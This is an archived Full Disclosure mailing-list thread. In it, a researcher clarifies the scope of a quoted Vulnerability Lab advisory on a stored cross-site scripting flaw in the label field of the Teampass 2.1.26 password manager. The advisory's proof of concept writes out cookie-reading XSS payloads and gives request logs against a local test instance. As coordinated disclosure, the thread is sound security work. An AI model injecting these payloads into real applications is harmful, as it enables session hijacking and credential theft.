[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <86a64e14-5538-43e5-9f6a-1937e2c19c36@gmail.com>
Date: Thu, 26 May 2016 10:40:40 +0200
From: Peter Kok <pk212111@...il.com>
To: Ulisses Montenegro <ulisses.montenegro@...il.com>,
Vulnerability Lab <research@...nerability-lab.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting
Vulnerability
Hi Ulisses,
The XSS found is a different one. The one mentioned on
https://github.com/nilsteampassnet/TeamPass/issues/1244 has a screenshot
where the XSS is inserted when creating a new role and by preventing the
javascript filters to execute. A new role can only be created by the
admin user. This XSS is also performed by inserting the <script> tag,
this tag does not work in the new found bug.
The new found
XSS(http://www.vulnerability-lab.com/get_content.php?id=1845) is
inserted in the label field of an item, this can be done by any
authenticated user that can create or edit an item. The XSS is executed
as soon as a user opens the folder that contains the item with the XSS
in the label field.
Peter
Op 25-5-2016 om 13:05 schreef Ulisses Montenegro:
> This looks very similar to the persistent XSS reported a while ago on the
> Teampass github, is it the same vulnerability?
>
> https://github.com/nilsteampassnet/TeamPass/issues/1244
>
>
>
> On 25 May 2016 at 19:10, Vulnerability Lab <research@...nerability-lab.com>
> wrote:
>
>> Document Title:
>> ===============
>> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
>>
>>
>> References (Source):
>> ====================
>> http://www.vulnerability-lab.com/get_content.php?id=1845
>>
>>
>> Release Date:
>> =============
>> 2016-05-24
>>
>>
>> Vulnerability Laboratory ID (VL-ID):
>> ====================================
>> 1845
>>
>>
>> Common Vulnerability Scoring System:
>> ====================================
>> 3.4
>>
>>
>> Product & Service Introduction:
>> ===============================
>> TeamPass is a Passwords Manager dedicated for managing passwords in a
>> collaborative way on any server Apache, MySQL and PHP.
>> It is especially designed to provide passwords access security for allowed
>> people. This makes TeamPass really useful in a
>> Business/Enterprise environment and will provide to IT or Team Manager a
>> powerful and easy tool for customizing passwords
>> access depending on the user’s role.
>>
>> (Copy of the Homepage: http://teampass.net/ )
>>
>>
>> Abstract Advisory Information:
>> ==============================
>> An independent vulnerability laboratory researcher discovered an
>> application-side cross site scripting vulnerability in the Teampass
>> v2.1.25/26 application.
>>
>>
>> Vulnerability Disclosure Timeline:
>> ==================================
>> 2016-05-17: Researcher Notification & Coordination (Peter Kok)
>> 2016-05-18 Vendor Notification (Teampass Security Team)
>> 2016-05-18: Vendor Response/Feedback (Teampass Security Team)
>> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team)
>> 2016-05-24: Public Disclosure (Vulnerability Laboratory)
>>
>>
>> Discovery Status:
>> =================
>> Published
>>
>>
>> Affected Product(s):
>> ====================
>> Nils Laumaillé
>> Product: Teampass Password Manager - Online Service (Web-Application)
>> 2.1.25
>>
>> Nils Laumaillé
>> Product: Teampass Password Manager - Online Service (Web-Application)
>> 2.1.26
>>
>>
>> Exploitation Technique:
>> =======================
>> Remote
>>
>>
>> Severity Level:
>> ===============
>> Medium
>>
>>
>> Technical Details & Description:
>> ================================
>> An application-side cross site scripting web vulnerability has been
>> discovered in the official Teampass v2.1.26 web-application.
>> The vulnerability allows remote attackers to inject own malicious script
>> codes to the application-side of the vulnerable module or function.
>>
>> Teampass allows authenticated users to create items to store usernames,
>> passwords, descriptions, files and more. When creating or editing an
>> item the very first field, the label field, is vulnerable to iframe
>> injection and XSS insertion. The iframe or cross site scripting will be
>> executed as soon as a user opens a folder. The attack vector is persistent
>> and the request method to inject is POST.
>>
>> The security risk of the application-side vulnerability is estimated as
>> medium with a cvss (common vulnerability scoring system) count of 3.4.
>> Exploitation of the persistent web vulnerability requires a low privileged
>> web-application user account and low or medium user interaction.
>> Successful exploitation of the vulnerability results in session hijacking,
>> persistent phishing attacks, persistent external redirects to
>> malicious source and persistent manipulation of affected or connected
>> application modules.
>>
>> Request Method(s):
>> [+] POST
>>
>> Vulnerable Function(s):
>> [+] Add or Edit (Label)
>>
>> Vulnerable Parameter(s):
>> [+] label name
>>
>> Affected Module(s):
>> [+] Item Listing
>>
>>
>> Proof of Concept (PoC):
>> =======================
>> The persistent cross site scripting web vulnerability can be exploited by
>> remote attackers without privileged web-application user account and low or
>> medium user interaction.
>> For security demonstration or to reproduce the vulnerability follow the
>> provided information and steps below to continue.
>>
>> Manual steps to reproduce the vulnerability ...
>> 1. Create or edit an item
>> 2. Change the first label name field to a script code payload
>> Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"
>> onload=alert(document.cookie)<></iframe> or
>> <svg/onload=alert(document.cookie)>
>> 3. The execute occurs in the main label field output context value
>> 4. Successful reproduce of the application-side vulnerability!
>>
>>
>> --- PoC Session Logs [POST] ---
>> Status: 200[OK]
>> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>> Mime Type[application/json]
>> Request Header:
>> Host[teampass.localhost:8080]
>> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
>> Gecko/20100101 Firefox/46.0]
>> Accept[application/json, text/javascript, */*; q=0.01]
>> X-Requested-With[XMLHttpRequest]
>> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
>> PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>> Connection[keep-alive]
>> POST-Daten:
>> cproject_id[23]
>> password_id[73]
>> name[Dans+Linux+user+%22%3E%3C[SCIRPT CODE PAYLOAD INJECT VIA NAME
>> LABEL!]%3E]
>> tags[]
>> hidden-tags[]
>> access_info[]
>> faketextdonotautofill1[]
>> username[dan]
>> faketextdonotautofill2[]
>> email[]
>> fakepwddonotautofill1[]
>> password[hello]
>> password_visible[hello]
>> fakepwddonotautofill2[]
>> repeat_password[hello]
>> repeat_password_visible[hello]
>> expiry_date_edit[]
>> notes[]
>> Response Header:
>> Date[Wed, 25 May 2016 08:53:48 GMT]
>> Server[Apache]
>> X-Powered-By[PHP/5.4.4-14+deb7u8]
>> Expires[Thu, 19 Nov 1981 08:52:00 GMT]
>> Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0]
>> Pragma[no-cache]
>> Content-Length[74]
>> Keep-Alive[timeout=5, max=99]
>> Connection[Keep-Alive]
>> Content-Type[application/json; charset=utf-8]
>> -
>> Status: 200[OK]
>> GET http://teampass.localhost:8080/index.php/checkss/n/pwd
>> Mime Type[text/html]
>> Request Header:
>> Host[teampass.localhost:8080]
>> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
>> Gecko/20100101 Firefox/46.0]
>> Accept[text/html, */*; q=0.01]
>> X-Requested-With[XMLHttpRequest]
>> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
>> __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>> Connection[keep-alive]
>> Response Header:
>> Date[Wed, 25 May 2016 08:53:49 GMT]
>> Server[Apache]
>> X-Powered-By[PHP/5.4.4-14+deb7u8]
>> Connection[Keep-Alive]
>> Content-Type[text/html]
>>
>>
>> Reference(s):
>> http://teampass.localhost:8080/
>> http://teampass.localhost:8080/index.php/
>> http://teampass.localhost:8080/index.php/pwd/
>> http://teampass.localhost:8080/index.php/checkss/
>> http://teampass.localhost:8080/index.php/checkss/n/
>> http://teampass.localhost:8080/index.php/checkss/n/pwd
>> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/
>> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>>
>>
>> Security Risk:
>> ==============
>> The security risk of the application-side cross site scripting
>> vulnerability in the teampass application is estimated as medium. (CVSS 3.4)
>>
>>
>> Credits & Authors:
>> ==================
>> Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
>>
>>
>> Disclaimer & Information:
>> =========================
>> The information provided in this advisory is provided as it is without any
>> warranty. Vulnerability Lab disclaims all warranties, either expressed or
>> implied,
>> including the warranties of merchantability and capability for a
>> particular purpose. Vulnerability-Lab or its suppliers are not liable in
>> any case of damage,
>> including direct, indirect, incidental, consequential loss of business
>> profits or special damages, even if Vulnerability-Lab or its suppliers have
>> been advised
>> of the possibility of such damages. Some states do not allow the exclusion
>> or limitation of liability for consequential or incidental damages so the
>> foregoing
>> limitation may not apply. We do not approve or encourage anybody to break
>> any licenses, policies, deface websites, hack into databases or trade with
>> stolen data.
>>
>> Domains: www.vulnerability-lab.com - www.vuln-lab.com
>> - www.evolution-sec.com
>> Contact: admin@...nerability-lab.com -
>> research@...nerability-lab.com -
>> admin@...lution-sec.com
>> Section: magazine.vulnerability-lab.com -
>> vulnerability-lab.com/contact.php -
>> evolution-sec.com/contact
>> Social: twitter.com/vuln_lab -
>> facebook.com/VulnerabilityLab -
>> youtube.com/user/vulnerability0lab
>> Feeds: vulnerability-lab.com/rss/rss.php -
>> vulnerability-lab.com/rss/rss_upcoming.php -
>> vulnerability-lab.com/rss/rss_news.php
>> Programs: vulnerability-lab.com/submit.php -
>> vulnerability-lab.com/list-of-bug-bounty-programs.php -
>> vulnerability-lab.com/register.php
>>
>> Any modified copy or reproduction, including partially usages, of this
>> file requires authorization from Vulnerability Laboratory. Permission to
>> electronically
>> redistribute this alert in its unmodified form is granted. All other
>> rights, including the use of other media, are reserved by Vulnerability-Lab
>> Research Team or
>> its suppliers. All pictures, texts, advisories, source code, videos and
>> other information on this website is trademark of vulnerability-lab team &
>> the specific
>> authors or managers. To record, list, modify, use or edit our material
>> contact (admin@ or research@...nerability-lab.com) to get a ask
>> permission.
>>
>> Copyright © 2016 | Vulnerability
>> Laboratory - [Evolution Security GmbH]™
>>
>>
>>
>>
>> --
>> VULNERABILITY LABORATORY - RESEARCH TEAM
>> SERVICE: www.vulnerability-lab.com
>> CONTACT: research@...nerability-lab.com
>>
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists